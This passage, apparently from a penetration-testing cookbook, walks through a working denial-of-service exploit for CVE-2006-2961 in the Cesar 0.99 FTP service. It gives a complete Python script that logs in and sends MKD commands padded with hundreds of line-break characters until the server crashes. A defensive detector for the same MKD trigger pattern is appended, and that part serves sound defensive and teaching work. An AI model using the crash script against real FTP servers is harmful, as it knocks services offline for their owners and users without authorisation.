How to do it...

There is a publicly disclosed vulnerability associated with the Cesar 0.99 FTP service. This vulnerability is defined by the Common Vulnerabilities and Exposures (CVE) numbering system as CVE-2006-2961. Researching this vulnerability shows that a stack-based buffer overflow can be triggered by sending, after authentication, a sequence of line-break characters as the argument of the MKD command:

  1. To avoid the difficulty of passing the \n escape sequence to the Python script and then having it properly interpreted in the supplied input, we modify the script that was discussed in the previous recipe. We can then use the modified script to exploit this existing vulnerability, as follows:

```python
#!/usr/bin/python

import socket
import sys

if len(sys.argv) != 5:
    print "Usage - ./ftp_fuzz.py [Target-IP] [Port Number] [Interval] [Maximum]"
    print "Example - ./ftp_fuzz.py 10.0.0.5 21 100 1000"
    print "Example will fuzz the defined FTP service with a series of line break "
    print "characters to include 100 '\\n's, 200 '\\n's, etc... up to the maximum of 1000"
    sys.exit()

target = str(sys.argv[1])
port = int(sys.argv[2])
i = int(sys.argv[3])          # the first payload length equals the interval
interval = int(sys.argv[3])
max = int(sys.argv[4])
user = raw_input(str("Enter ftp username: "))
passwd = raw_input(str("Enter ftp password: "))
command = raw_input(str("Enter FTP command to fuzz: "))

while i <= max:
    try:
        # Hardcoded line-break payload: the chosen command followed by i newline characters
        payload = command + " " + ('\n' * i)
        print "Sending " + str(i) + " line break characters to target"
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        connect = s.connect((target, port))
        s.recv(1024)
        # Authenticate first; the overflow is post-authentication
        s.send('USER ' + user + '\r\n')
        s.recv(1024)
        s.send('PASS ' + passwd + '\r\n')
        s.recv(1024)
        s.send(payload + '\r\n')
        s.send('QUIT\r\n')
        s.recv(1024)
        s.close()
        i = i + interval
    except:
        print "\nUnable to send...Server may have crashed"
        sys.exit()

print "\nThere is no indication that the server has crashed"
```
  2. The modifications to the script are an updated usage description, the removal of the payload as a supplied argument, and a hardcoded line-break payload that is sent in increasing sequence.
  3. If the script is executed without the appropriate number of system arguments, it returns the expected usage. We can then execute the script and send a series of payloads in multiples of 100, up to the maximum of 1000.
  4. After sending the payload of 700 line-break characters, the script stops sending payloads and sits idle. After a period of inactivity, the script is forced to close with Ctrl + C. The script indicates that it has been unable to send characters and that the remote server might have crashed. Have a look at the following screenshot:
  5. By returning to the Windows XP machine that is running the Cesar 0.99 FTP service, we can see that the server.exe application has crashed. To resume operations after the denial of service, the Cesar FTP service has to be manually restarted.
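As the defender's counterpart to this recipe, here is an added example (not from the book or the Cesar FTP project) that inspects a captured client-to-server FTP control-channel stream and flags MKD requests shaped like the CVE-2006-2961 trigger: an argument that carries embedded line-break bytes or is abnormally long. The sample stream, the 256-byte threshold and the function names are assumptions.

```python
#!/usr/bin/env python3
"""Hypothetical detector for the CVE-2006-2961 trigger pattern on the FTP control channel."""

# MKD and its legacy alias are the verbs affected by CVE-2006-2961
WATCHED_VERBS = {b"MKD", b"XMKD"}
MAX_ARG_LEN = 256  # assumed site threshold; legitimate directory names are far shorter


def split_commands(stream, terminator=b"\r\n"):
    """Split a raw client->server control-channel byte stream into (verb, argument) tuples.
    Records are split on CRLF only, so a bare LF inside an argument stays in the argument
    instead of being mistaken for the start of a new command."""
    records = []
    for raw in stream.split(terminator):
        if not raw:
            continue
        verb, _, arg = raw.partition(b" ")
        records.append((verb.upper(), arg))
    return records


def find_mkd_overflow_attempts(stream, max_arg_len=MAX_ARG_LEN):
    """Return one finding per MKD/XMKD request whose argument is oversized or contains
    embedded CR/LF bytes; benign sessions yield an empty list."""
    findings = []
    for idx, (verb, arg) in enumerate(split_commands(stream)):
        if verb not in WATCHED_VERBS:
            continue
        reasons = []
        if b"\n" in arg or b"\r" in arg:
            reasons.append("embedded line-break bytes in argument")
        if len(arg) > max_arg_len:
            reasons.append("argument length %d exceeds %d" % (len(arg), max_arg_len))
        if reasons:
            findings.append({"index": idx, "verb": verb.decode(),
                             "arg_len": len(arg), "reasons": reasons})
    return findings


# Constructed sample session (not real captured traffic): a normal login, one benign MKD,
# then a request shaped like the fuzzing script's 700-line-break payload.
SAMPLE_STREAM = (b"USER anonymous\r\n"
                 + b"PASS guest@example.invalid\r\n"
                 + b"MKD reports\r\n"
                 + b"MKD " + b"\n" * 700 + b"\r\n"
                 + b"QUIT\r\n")

if __name__ == "__main__":
    for f in find_mkd_overflow_attempts(SAMPLE_STREAM):
        print("record %(index)d %(verb)s (%(arg_len)d bytes): %(reasons)s" % f)
```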